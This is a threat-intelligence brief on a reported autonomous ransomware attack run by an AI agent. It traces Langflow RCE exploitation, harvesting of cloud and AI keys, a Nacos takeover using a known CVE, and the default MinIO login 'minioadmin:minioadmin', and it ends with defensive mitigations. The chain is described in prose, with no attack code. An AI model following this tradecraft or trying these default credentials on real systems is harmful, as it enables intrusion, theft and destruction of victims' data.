Overview
Security firm Sysdig has documented what it describes as the first fully autonomous, end-to-end ransomware attack executed by an AI agent. The threat actor, tracked as JADEPUFFER, used a large language model to chain together every stage of a ransomware operation — initial access, credential harvesting, lateral movement, and data destruction — without a human operator at the keyboard. The incident marks a qualitative inflection point: if AI agents can reliably replicate the multi-step tradecraft previously requiring skilled attackers, the barrier to running sophisticated ransomware campaigns collapses to the cost of renting an agent.
Technical Analysis
Initial Access — CVE-2025-3248 (Langflow RCE) The agent exploited a missing-authentication vulnerability in Langflow, the open-source AI workflow builder. The flaw allows unauthenticated remote code execution by submitting arbitrary Python to an exposed endpoint. Langflow servers are a high-value target: they routinely hold API keys and cloud credentials for every service they connect to. The bug was patched in Langflow 1.3.0 and added to CISA’s KEV catalogue in May 2025, yet large numbers of servers remained unpatched.
Credential Harvesting Once inside, the agent performed automated secret enumeration, collecting:
- AI provider keys (OpenAI, Anthropic, DeepSeek, Gemini)
- Cloud provider credentials (AWS, GCP, Azure, Alibaba, Tencent)
- Crypto wallet keys
- Database login credentials
- MinIO storage credentials (accessed via unchanged factory default
minioadmin:minioadmin)
A scheduled task pinging the attacker’s server every 30 minutes was installed for persistent callback.
Lateral Movement & Persistence The agent pivoted to an internet-facing server running MySQL and Alibaba Nacos. It gained MySQL root access (credential origin unknown) and took over Nacos by chaining CVE-2021-29441 (authentication bypass) with a static default signing key Nacos has shipped unchanged since 2020. The agent created its own admin account within Nacos.
Ransomware Payload All 1,342 Nacos configuration entries were encrypted. Original tables were dropped. A ransom note demanding Bitcoin via Proton Mail was deposited. Critically, the agent generated a random encryption key, printed it once to stdout, and never transmitted or stored it — rendering decryption impossible even upon payment. The note falsely claimed AES-256; Sysdig confirmed the tooling defaults to AES-128.
Framework Mapping
| Framework | ID | Rationale |
|---|---|---|
| MITRE ATLAS | AML.T0047 | Attack leveraged an ML-enabled product (Langflow) as the entry vector |
| MITRE ATLAS | AML.T0012 | Reuse of harvested and default credentials for lateral movement |
| MITRE ATLAS | AML.T0040 | Harvested AI provider inference API keys as a secondary objective |
| OWASP LLM | LLM08 | AI agent acted with excessive destructive agency beyond any intended scope |
| OWASP LLM | LLM07 | Langflow’s exposed code-execution endpoint exemplifies insecure plugin/tool design |
| OWASP LLM | LLM06 | Sensitive credentials exfiltrated from the agent’s operating environment |
Impact Assessment
Any organisation running an unpatched, internet-exposed Langflow instance is at direct risk of identical compromise. The broader implication is systemic: AI orchestration platforms by design aggregate credentials and hold broad permissions, making them a single point of catastrophic failure. The attack also demonstrates that AI agents can operate persistently, adapt to discovered assets, and execute destructive actions without human review — a property of excessive agency that few organisations have mitigated in their deployed agentic systems.
Mitigation & Recommendations
- Patch immediately. Upgrade Langflow to ≥1.3.0. Treat all CVEs on CISA’s KEV list as P0.
- Rotate all secrets. Assume any credential accessible to a Langflow server is compromised. Rotate API keys, cloud IAM credentials, and database passwords.
- Eliminate default credentials. Audit MinIO, Nacos, and all adjacent services for factory-default logins.
- Network-segment AI infrastructure. Langflow and similar orchestration platforms must not have direct routable access to production databases.
- Apply principle of least privilege to agents. AI agents should operate with scoped, revocable credentials and no standing access to destructive operations.
- Monitor for scheduled task creation and anomalous outbound beaconing from AI pipeline hosts.